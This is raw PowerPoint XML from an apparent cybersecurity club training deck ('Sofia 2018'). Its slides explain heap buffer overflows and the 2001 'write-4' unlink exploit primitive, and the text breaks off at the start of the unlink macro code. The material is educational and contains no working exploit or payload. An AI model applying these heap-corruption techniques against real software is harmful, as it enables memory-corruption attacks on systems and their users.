          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="ctr" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="609475" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1218960" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828437" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2437918" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3047392" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3656867" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4266347" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4875825" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" algn="ctr" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507999" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="0" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="609475" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1218960" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828437" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2437918" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="3047392" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3656867" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4266347" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4875825" algn="l" defTabSz="1218960" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914354"/>
            <a:fld id="{C87E8D51-AD08-48EE-84A7-E19A6D3C2143}" type="slidenum">
              <a:rPr lang="en-US" sz="800" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr defTabSz="914354"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3497057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62" r:id="rId6"/>
    <p:sldLayoutId id="2147483652" r:id="rId7"/>
    <p:sldLayoutId id="2147483653" r:id="rId8"/>
    <p:sldLayoutId id="2147483654" r:id="rId9"/>
    <p:sldLayoutId id="2147483663" r:id="rId10"/>
    <p:sldLayoutId id="2147483664" r:id="rId11"/>
    <p:sldLayoutId id="2147483665" r:id="rId12"/>
    <p:sldLayoutId id="2147483668" r:id="rId13"/>
    <p:sldLayoutId id="2147483666" r:id="rId14"/>
    <p:sldLayoutId id="2147483667" r:id="rId15"/>
  </p:sldLayoutIdLs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3"/>
        </a:buClr>
        <a:buFont typeface="Century Gothic" panose="020B0502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3"/>
        </a:buClr>
        <a:buFont typeface="Century Gothic" panose="020B0502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3"/>
        </a:buClr>
        <a:buFont typeface="Century Gothic" panose="020B0502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Century Gothic" panose="020B0502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Century Gothic" panose="020B0502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hyperlink" Target="https://blogs.technet.microsoft.com/srd/2009/08/04/preventing-the-exploitation-of-user-mode-heap-corruption-vulnerabilities"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blogs.technet.microsoft.com/srd/2009/08/04/preventing-the-exploitation-of-user-mode-heap-corruption-vulnerabilities/"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notesSlide" Target="../notesSlides/notesSlide14.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/video" Target="https://www.youtube.com/embed/oY8NNBVmoaM" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/JDeZutter/CyberSecurityClub/blob/master/letitsnow.txt" TargetMode="Externa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9.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12.xml"/><Relationship Id="rId5" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto4.wdp"/><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07;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{163192B7-8DAA-4D79-8706-9E055E246219}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904875" y="1422767"/>
            <a:ext cx="10629779" cy="1015800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
                <a:cs typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>WELCOME  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
                <a:cs typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
                <a:cs typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>Cyber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0099CC"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
                <a:cs typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
                <a:cs typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t> Club</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
                <a:cs typeface="Montserrat Medium"/>
                <a:sym typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>                 </a:t>
            </a:r>
            <a:endParaRPr sz="5400" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Montserrat Medium"/>
              <a:ea typeface="Montserrat Medium"/>
              <a:cs typeface="Montserrat Medium"/>
              <a:sym typeface="Montserrat Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6A89775-1E72-4EF5-8AF7-48F58E2143E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10774017" y="6488668"/>
            <a:ext cx="1303562" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Sofia 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B4BD5DC-1992-439B-A4D8-53B0E38473A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9842672" y="6119336"/>
            <a:ext cx="2234907" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Joachim De Zutter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2213375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51379" y="368491"/>
            <a:ext cx="11245850" cy="632939"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer overflow vulnerabilities: heap memory allocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 4" descr="Image result for heap memory grows up chun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376" y="1323833"/>
            <a:ext cx="6334752" cy="4735773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="419100" dist="419100" dir="2520000" algn="l" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:alpha val="38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8159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56350" y="418608"/>
            <a:ext cx="11245850" cy="593380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap overflow vulnerabilities: write-4 exploit primitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(2001)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="90000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{235A50F9-0DAE-411C-88F7-8B194443629D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615097" y="1606848"/>
            <a:ext cx="11247120" cy="4441372"/>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3"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502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3"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502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3"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502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Century Gothic" panose="020B0502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Century Gothic" panose="020B0502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2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> When freed memory is removed from doubly-linked list:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “Exploit primitive”: technique to make a program go in a specific state (an exploit “building block”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “Write-4 primitive”: method to write an address of our choice to an address of our choice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95976269-C9EB-4099-8361-73710B34CB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556350" y="2313624"/>
            <a:ext cx="3988548" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define unlink(p, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEF88A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
